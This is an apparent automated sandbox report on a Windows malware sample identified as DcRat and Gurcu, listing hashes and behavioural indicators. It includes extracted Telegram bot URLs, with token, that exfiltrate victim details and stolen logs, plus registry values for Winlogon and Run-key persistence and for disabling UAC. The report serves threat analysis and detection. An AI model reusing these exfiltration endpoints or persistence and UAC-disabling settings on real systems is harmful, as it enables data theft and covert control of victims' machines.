Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system -
submitted
15-11-2024 23:13
Behavioral task
behavioral1
Sample
1.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1.exe
Resource
win10v2004-20241007-en
General
-
Target
1.exe
-
Size
2.5MB
-
MD5
a13b59f33063b970d7adbe2a23fb5a81
-
SHA1
7a8f1204af663a38f87816c528e27137f310ae42
-
SHA256
9700e6f8ed338b7ebf337feef5a215a65d061a709a9067218d5ae73093ecb946
-
SHA512
6affe7c79c186e4d466c2f975987af39452d9991453d394efdf93af67c5d8e367ab867625d17ecdb2778c5962c40eea9a207e15c48f9346c58d875b86ce7459f
-
SSDEEP
49152:qbA3q2mzyt2DixLb4I5KKnK5zgdlKWkyT:qbrtzyoWFbvKKnK5Anks
Malware Config
Extracted
gurcu
https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendPhoto?chat_id=7606992605&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20c325be7df51e043c04c118ef2bb738d43e08ff03%0A%E2%80%A2%20Comment%3A%20%D1%8E%D1%82%D1%83%D0%B1%0A%0A%E2%80%A2%20User%20Name%3A%20Admin%0A%E2%80%A2%20PC%20Name%3A%20ZTSLLRFH%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20181.215.176.83%0A%E2%80%A2%20GEO%3A%20GB%20%2F%20London%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5Cbrowserperf%5Csysmon.ex
https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendDocument?chat_id=7606992605&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20c325be7df51e043c04c118ef2bb738d43e08ff03%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A38.392558
https://api.telegram.org/bot7606992605:AAHdyli6CX1hNl7JUoS2-auLJ7WvyqQjHD8/sendDocument?chat_id=7606992605&caption=%F0%9F%93%8E%20Log%20collected%20%F0%9F%93%8E%0A%E2%80%A2%20ID%3A%20c325be7df51e043c04c118ef2bb738d43e08ff03%0A%0A%E2%80%A2%20Scanned%20Directories%3A%200%0A%E2%80%A2%20Elapsed%20Time%3A%2000%3A00%3A11.283864
Signatures
-
DcRat
DarkCrystal (DC) is a .NET RAT, active since June 2019, that is capable of loading additional plugins.
-
Dcrat family
-
Gurcu family
-
Modifies WinLogon for persistence 2 TTPs 17 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\", \"C:\\browserperf\\dllhost.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\", \"C:\\browserperf\\dllhost.exe\", \"C:\\browserperf\\unsecapp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\BlockDriversession.exe\", \"C:\\Program Files\\Windows Defender\\en-US\\sysmon.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files 
(x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\", \"C:\\browserperf\\dllhost.exe\", \"C:\\browserperf\\unsecapp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\BlockDriversession.exe\", \"C:\\Program Files\\Windows Defender\\en-US\\sysmon.exe\", \"C:\\Windows\\Help\\en-US\\dwm.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\", \"C:\\browserperf\\dllhost.exe\", \"C:\\browserperf\\unsecapp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\BlockDriversession.exe\", \"C:\\Program Files\\Windows Defender\\en-US\\sysmon.exe\", \"C:\\Windows\\Help\\en-US\\dwm.exe\", \"C:\\Users\\Public\\Videos\\Idle.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files 
(x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\", \"C:\\browserperf\\dllhost.exe\", \"C:\\browserperf\\unsecapp.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files 
(x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\", \"C:\\browserperf\\dllhost.exe\", \"C:\\browserperf\\unsecapp.exe\", \"C:\\browserperf\\csrss.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\", \"C:\\browserperf\\dllhost.exe\", \"C:\\browserperf\\unsecapp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", 
\"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\", \"C:\\Users\\Public\\lsass.exe\", \"C:\\browserperf\\dllhost.exe\", \"C:\\browserperf\\unsecapp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Recovery\\WindowsRE\\BlockDriversession.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\", \"C:\\browserperf\\cmd.exe\", \"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\", \"C:\\Users\\Default\\Documents\\SearchApp.exe\", \"C:\\browserperf\\csrss.exe\", \"C:\\browserperf\\sysmon.exe\", \"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\", \"C:\\browserperf\\upfc.exe\"" BlockDriversession.exe -
Process spawned unexpected child process 51 IoCs
This typically indicates that the parent process was compromised, e.g. via an exploit or a malicious macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2932 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2396 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1852 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2220 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4060 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4584 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2936 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2364 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4796 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1472 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2876 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4500 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4448 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2244 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2552 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4112 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3728 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4004 1432 
schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2804 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2404 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3636 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1068 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4932 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1292 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3804 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4536 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2568 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4788 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3424 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1492 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1992 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3976 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5012 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1392 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3752 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1736 1432 schtasks.exe 98 Parent 
C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2904 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4196 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3236 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1044 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2060 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3404 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 976 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1428 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1612 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 216 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4052 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2716 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3488 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4828 1432 schtasks.exe 98 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 64 1432 schtasks.exe 98 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" BlockDriversession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" BlockDriversession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" BlockDriversession.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" sysmon.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" sysmon.exe -
resource yara_rule behavioral2/files/0x000a000000023ba8-10.dat dcrat behavioral2/memory/1508-13-0x0000000000270000-0x000000000049E000-memory.dmp dcrat behavioral2/files/0x0008000000023c83-102.dat dcrat behavioral2/files/0x000e000000023bb8-122.dat dcrat behavioral2/files/0x0009000000023c0e-159.dat dcrat behavioral2/files/0x000b000000023c16-182.dat dcrat behavioral2/files/0x0014000000023c91-220.dat dcrat behavioral2/files/0x000d000000023c68-257.dat dcrat behavioral2/memory/416-276-0x0000000000110000-0x000000000033E000-memory.dmp dcrat -
Disables Task Manager via registry modification
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts BlockDriversession.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up the country code configured in the registry, likely for geofencing.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation 1.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation BlockDriversession.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation sysmon.exe Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation sysmon.exe -
Executes dropped EXE 11 IoCs
pid Process 1508 BlockDriversession.exe 416 sysmon.exe 1224 sysmon.exe 1408 sysmon.exe 1992 sysmon.exe 632 sysmon.exe 4788 sysmon.exe 1428 sysmon.exe 4296 sysmon.exe 4052 sysmon.exe 2276 sysmon.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials and similar sensitive data.
-
Adds Run key to start application 2 TTPs 32 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\browserperf\\sysmon.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\browserperf\\dllhost.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\browserperf\\dllhost.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Public\\Videos\\Idle.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\Public\\lsass.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\browserperf\\unsecapp.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\Help\\en-US\\dwm.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\browserperf\\cmd.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\browserperf\\sysmon.exe\"" 
BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BlockDriversession = "\"C:\\Recovery\\WindowsRE\\BlockDriversession.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WaaSMedicAgent = "\"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\browserperf\\csrss.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Users\\Admin\\3D Objects\\sppsvc.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\browserperf\\upfc.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Windows\\Help\\en-US\\dwm.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Public\\Videos\\Idle.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\SystemResources\\Windows.UI.BlockedShutdown\\pris\\WmiPrvSE.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\Program Files\\Windows Defender\\en-US\\sysmon.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Users\\Default\\Documents\\SearchApp.exe\"" BlockDriversession.exe Set value (str) 
\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SearchApp = "\"C:\\Users\\Default\\Documents\\SearchApp.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WaaSMedicAgent = "\"C:\\Program Files (x86)\\WindowsPowerShell\\WaaSMedicAgent.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\browserperf\\csrss.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Users\\Public\\lsass.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BlockDriversession = "\"C:\\Recovery\\WindowsRE\\BlockDriversession.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\browserperf\\cmd.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\unsecapp = "\"C:\\browserperf\\unsecapp.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysmon = "\"C:\\Program Files\\Windows Defender\\en-US\\sysmon.exe\"" BlockDriversession.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = 